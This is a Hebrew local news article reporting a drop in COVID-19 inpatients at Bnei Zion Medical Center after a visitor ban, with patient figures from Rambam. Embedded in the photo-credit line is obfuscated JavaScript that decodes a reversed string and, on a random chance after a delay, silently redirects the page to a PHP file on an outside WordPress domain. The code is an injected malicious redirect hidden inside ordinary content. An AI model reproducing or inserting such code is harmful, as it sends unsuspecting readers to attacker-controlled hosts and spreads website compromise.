fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

ירידה במספר חולי הקורונה בבני ציון

מנתונים שנמסרו עולה כי נרשמה ירידה חדה במספר חולי הקורונה כמו גם במספרם של הנדבקים
קורונה | צילום:shutters$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

ירידה משמעותית בשיעור של כ-23 אחוזים במספר חולי קורונה המאושפזים במרכז הרפואי בני ציון. בנוסף, חלה ירידה  בשיעור של כ-15 אחוזים במספר הנדבקים והמבודדים מקרב הצוותים הרפואיים והעובדים בבית החולים.

מנכ"ל המרכז הרפואי בני ציון ד"ר אוהד הוכמן : "להערכתנו,  הנתונים המעודדים על ירידה משמעותית במספר המאושפזים במחלקות הקורונה וגם בקרב הצוותים הרפואיים ועובדי בית החולים, נובעים גם בזכות החלטתנו ביום ראשון בשבוע שעבר. החלטה שהיא בתוקף עד עתה  לאסור, מתוך דאגה למטופלים, לצוותים  הרפואיים ולעובדי בית החולים, על כניסת מבקרים לבית החולים והיא מותרת גם כעת רק במקרים חריגים ובהם: הורה מלווה לילד, ליווי יולדת, פרידה מבן משפחה במצב סופני ומטפל סיעודי קבוע".

בארבעת מחלקות הקורונה במרכז הרפואי בני ציון מאושפזים כעת 59 חולים. מתוכם 34 במצב קשה, 12 נתמכי הנשמה ומונשמים, ו-22 במצב בינוני. ד"ר הוכמן :  "האיסור על כניסת מבקרים יחד עם מספר המתחסנים הגבוה נגד וירוס הקורונה מקרב הצוותים הרפואיים  ועובדי ביה"ח בשיעור של למעלה מ-80 אחוזים עד עתה ושל יותר מ-90 אחוזים  שהתחסנו נגד שפעת, מהווים תרומה משמעותית ביותר ואף מכרעת למיצובו של  בית חולים כבטוח, מסייעים וימשיכו  לסייע בהפחתה במספר הנדבקים בקרב מאושפזים ועובדים".

עוד נמסר מהמרכז הרפואי בני ציון, כי הערכת מצב מבוצעת מדי יום ובהתאם לרמת התחלואה, יוחלט אם ומתי לבטל את האיסור על כניסת מבקרים לביה"ח וגם אם להרחיב את הפעילות האלקטיבית לנוכח ההגבלה המשמעותית כיום  של פעילות זו  בבית החולים.

מבית החולים רמב"ם נמסר כי במתחם הקורונה ברמב"ם מאושפזים 94 חולים. 27 מהם בגילאי 40-60, קבוצת הגיל עם כמות החולים הגדולה ביותר: 22 חולים בקבוצת הגיל 61-70.

לחדשות נוספות בהד הקריות לחצו כאן * לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות